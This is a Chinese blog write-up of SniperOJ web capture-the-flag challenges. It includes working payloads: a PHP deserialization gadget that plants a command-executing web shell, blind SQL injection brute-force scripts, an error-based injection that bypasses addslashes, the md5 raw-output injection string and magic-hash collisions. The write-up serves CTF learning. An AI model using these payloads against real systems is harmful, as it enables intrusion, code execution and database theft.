SniperOJ web

好久没看web

php-object-injection

题目中提示Fuck, the powerline was suddenly cut off last night.说明有备份文件泄露,访问.index.php.swp得到index.php.swp

1
2
3
mv index.php.swp .index.php.swp
touch index.php
vim -r index.php

得到的源码声明了一个类

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<?php
class Logger{
private $logFile;
private $initMsg;
private $exitMsg;
function __construct($file){
// initialise variables
$this->initMsg="#--session started--#\n";
$this->exitMsg="#--session end--#\n";
$this->logFile = "/tmp/natas26_" . $file . ".log";
// write initial message
$fd=fopen($this->logFile,"a+");
fwrite($fd,$initMsg);
fclose($fd);
}
function log($msg){
$fd=fopen($this->logFile,"a+");
fwrite($fd,$msg."\n");
fclose($fd);
}
function __destruct(){
// write exit message
$fd=fopen($this->logFile,"a+");
fwrite($fd,$this->exitMsg);
fclose($fd);
}
}

构造序列化语句进行命令注入

1
2
3
4
5
6
7
8
9
10
11
<?php
class Logger{
private $logFile;
private $exitMsg;
function __construct($file){
$this->logFile = "img/666.php";
$this->exitMsg="<?php echo `cat ../* | grep \"SniperOJ\"`;?>";
}
}
print urlencode(base64_encode(serialize(new Logger('vsane'))));
?>

guess the code

很坑,一开始并没有找到源码泄露,后来发现在右键查看源码翻到最下面会看到

1
2
3
4
5
6
7
#try to read flag.php
Class whatthefuck{
public function __toString()
{
return highlight_file($this->source,true);
}
}

cookie的值做如下处理,发现传入的值被放入了数组

1
2
3
4
5
<?php
$input = "a%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22111111%22%3B%7D";
$arr = unserialize(urldecode($input));
print_r($arr);
?>

构造如下

1
2
3
4
5
6
7
8
9
10
11
12
<?php
Class whatthefuck{
public function __toString()
{
return highlight_file($this->source,true);
}
}
$input = new whatthefuck();
$input->source="flag.php";
$arr = array($input);
echo urlencode(serialize($arr));
?>

SniperOJ-Web-Browser

1
curl --header "x-forwarded-for:127.0.0.1" --local-port 23333 -A SniperOJ-Web-Broswer http://web2.sniperoj.cn:10005/

inject-again

按照提示访问http://120.24.215.80:10004/?username=1&password=1得到
Flag is the password of admin!,大概就是注入获得密码
尝试访问http://120.24.215.80:10004/?username=%27%20or%201%23&password=1页面返回admin,存在盲注,在简单的fuzz后发现过滤了; ( ) =
QQ截图20170804120242.jpg-22.3kB
尝试union查询表中列数,发现有3列,username在第二列,password在第三列
参考链接:SQL注入之骚姿势小记
参考order by之骚,利用条件是有对应注入出数据同一行的其他字段的回显
123.jpg-23.1kB
456.jpg-25.7kB
所以可知password的第一个字符为4,爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#!/usr/bin/env python
import requests
url = "http://120.24.215.80:10004/"
flag = ""
for i in range(50):
for j in range(48,127):
payload = "admin' union select 1,2,'%s' order by 3#" % (flag+chr(j))
params = {"username":payload,"password":"1"}
r = requests.get(url,params=params)
if "admin" in r.content:
flag = flag + chr(j-1)
print flag
break

very-hard-injection

参考:mysql多表update更新的几种方法
关于一个sql注入注入题目的思考

1
2
3
4
5
6
7
8
9
10
11
12
<?php
$link = mysqli_connect('localhost', 'root', 'root');
mysqli_select_db($link, 'code');
$table = addslashes($_GET['table']);
$sql = "UPDATE `{$table}`
SET `username`='admin'
WHERE id=1";
if(!mysqli_query($link, $sql)) {
echo(mysqli_error($link));
}
mysqli_close($link);

经过了addslashes处理,所以输入不能有单引号,双引号,反斜线等,还有sql语句不在同一行,所以不能用单行注释把后面的注释,看了dalao的思路,大概就是构造虚表,引入子查询,报错,构造如下sql语句

1
users` t left join (select char(97) as user from dual where (extractvalue(1,concat(0x7e,(select user()),0x7e)))) tt on tt.user=`t.username

php-weak-type

1
md5('240610708') == md5('QNKCDZO')

2048

git泄露,Git隐藏flag的新姿势,dalao写的很详细
QQ截图20170804162834.jpg-34.9kB

md5-vs-injection

当后台处理程序类似于下面的语句时,存在md5注入

1
$sql = "SELECT * FROM admin WHERE pass = '".md5($password,true)."'";

参数 描述
string 必需。规定要计算的字符串
raw 可选。规定十六进制或二进制输出格式 TRUE表示用原始16字符二进制格式,FALSE默认,用32字符十六进制数表示

ffifdyop经过md5后为276f722736c95d99e921722cf9ed621c,转成字符串后类似于'or'6<trash>

as fast as you can

1
2
3
4
5
6
7
import requests
import base64
r = requests.get("http://202.118.236.191:10003/",cookies={"PHPSESSID":"u6f6tl2hkeitoeb8rv2dt863u5"})
s = base64.b64decode(r.headers['Get-flag'])
r = requests.post("http://202.118.236.191:10003/",cookies={"PHPSESSID":"u6f6tl2hkeitoeb8rv2dt863u5"},data={"SniperOJ":"%s" % s})
print r.content

图书管理系统

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#!/usr/bin/env python
import requests
dic='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_{}'
flag = ''
for i in range(1,40):
for j in dic:
url = 'http://202.118.236.191:10009/src/API/login.php'
#payload = "vsane' or ascii(substr((select database()),'%d',1))='%d'#" % (i,ord(j))
#payload = "vsane' or ascii(substring((select group_concat(table_name) /*!from*/ information_schema.tables where table_schema=database()),'%d',1))='%d'#" % (i,ord(j))
#payload = "vsane' or ascii(substring((select group_concat(column_name) /*!from*/ information_schema.columns where table_name=0x666c6167),'%d',1))='%d'#" % (i,ord(j))
payload = "vsane' or ascii(substring((select fl4g /*!from*/ flag),'%d',1))='%d'#" % (i,ord(j))
data = {'username': payload,
'password':'vsane',
'submit':'%E6%8F%90%E4%BA%A4'
}
s=requests.post(url=url,data=data)
length = len(s.text)
if length == 28:
flag += j
print flag
break
print flag

×

纯属好玩

扫码支持
扫码打赏,你说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

文章目录
  1. 1. php-object-injection
  2. 2. guess the code
  3. 3. SniperOJ-Web-Browser
  4. 4. inject-again
  5. 5. very-hard-injection
  6. 6. php-weak-type
  7. 7. 2048
  8. 8. md5-vs-injection
  9. 9. as fast as you can
  10. 10. 图书管理系统
,